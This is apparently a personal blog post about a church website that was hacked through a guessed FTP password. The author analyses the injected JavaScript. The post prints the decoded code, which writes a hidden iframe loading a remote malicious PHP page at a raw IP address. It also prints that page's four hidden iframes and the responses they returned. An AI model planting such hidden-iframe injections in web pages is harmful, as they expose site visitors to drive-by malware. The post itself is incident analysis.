Well, my church's website got bit this week. I'll point out that I have nothing to do with the hosting or security of this site, I just help them keep it updated. The site is hosted at IPower, which in my overall opinion as a hosting company falls somewhere between pond scum and moss. No wait, make it rock. Scum or moss would be giving them too much credit. (That's another story though) Fortunately for IPower, this one can't be blamed on them. It appears someone guessed our FTP login's password, (probably a port scan and brute force attack) and recursively perused through our site modifying any file which was named index.*The following snipped of code was added to the bottom of each of those pages: The string is just a url encoded string of JavaScript. The unescape() function de-obfuscates it and then it is passed into the eval() to be executed. This is the equivalent code:
[code]<script>
window.status='Done';
document.write('<iframe name=8b4 src=\'http://58.65.232.33/gpack/index.php?'+Math.round(Math.random()*20655)+'4d\' width=765 height=27 style=\'display: none\'></iframe>';
</script>
[/code]
So, you can see whenever someone visits your site, an iframe is loaded at the bottom of the page that includes the output of a remote (and malicious) PHP script. I immediately called up and changed the password on our main FTP account and had two additional FTP accounts deleted that weren't even in use. I don't even know what their passwords where... yikes! Then I searched through the entire site and manually cleaned all files that had the offending JavaScript inserted into them. I'm fairly confident that was the only damage done, but it's hard to be sure. Luckily the entire site is just a bunch of static content so there were no code secrets or additional passwords to be lost. The whole thing kind of makes me uneasy though. Of course, the brilliant folks over at IPower don't keep ANY authentication logs for their FTP servers. Lame. Well, today I got a chance to fiddle with the Script injection to try and see what it was loading. The contents of the malicious page were as follows:
[code] <iframe src= http://58.65.232.33/nonick/index.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src= http://58.65.232.33/gpack/index1.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src= http://58.65.232.33/counter.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
<iframe src= http://58.65.232.33/01/01/update.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>
[/code]
Interesting. Apparently just an additional layer of smoke, but those four iframes still pointed to pages on the same server. The first iframe returned the following with a 200 status code:
[code] .   ![/code]
I'll let you take a stab at what that was supposed to do. The second iframe returned the following with a 200 status code:
[code]Can`t connect to mysql server[/code]
Very, very 31337 indeed. The third iframe returned the following with a 200 status code:
[code] <HTML>
<HEAD>
<TITLE>Not Found</TITLE>
</HEAD>
<BODY>
The requested URL was not found on this server.
<br><br><HR noshade="noshade">
Apache/1.3.31 Server at Port 80
</BODY>
</HTML>[/code]
Not sure why it didn't give me a 404 status code. The fourth iframe returned an empty response body with a 302 status code and an empty location header. Weird. Well, it looks like they have either taken down the malicious content since Sunday, or they are too stupid to keep their site up. In the mean time we'll try not to be too stupid to have easy-to-crack passwords. And I leave us with this well-written line from Weird Al:
[code]%57%68%61%74%63%68%61%27%6C%6C%20%77%61%6E%6E%61%20%64%6F%3F%20%57%61%6E%6E%61%20%62%65%20%68%61%63%6B%65%72%73%3F%20%43%6F%64%65%20%63%72%61%63%6B%65%72%73%2C%20%73%6C%61%63%6B%65%72%73%20%57%61%73%74%69%6E%27%20%74%69%6D%65%20%77%69%74%68%20%61%6C%6C%20%74%68%65%20%63%68%61%74%72%6F%6F%6D%20%79%61%6B%6B%65%72%73%3F%209%20%74%6F%205%20%63%68%69%6C%6C%69%6E%27%20%61%74%20%48%65%77%6C%65%74%74%2D%50%61%63%6B%61%72%64%20%57%68%61%74%3F[/code]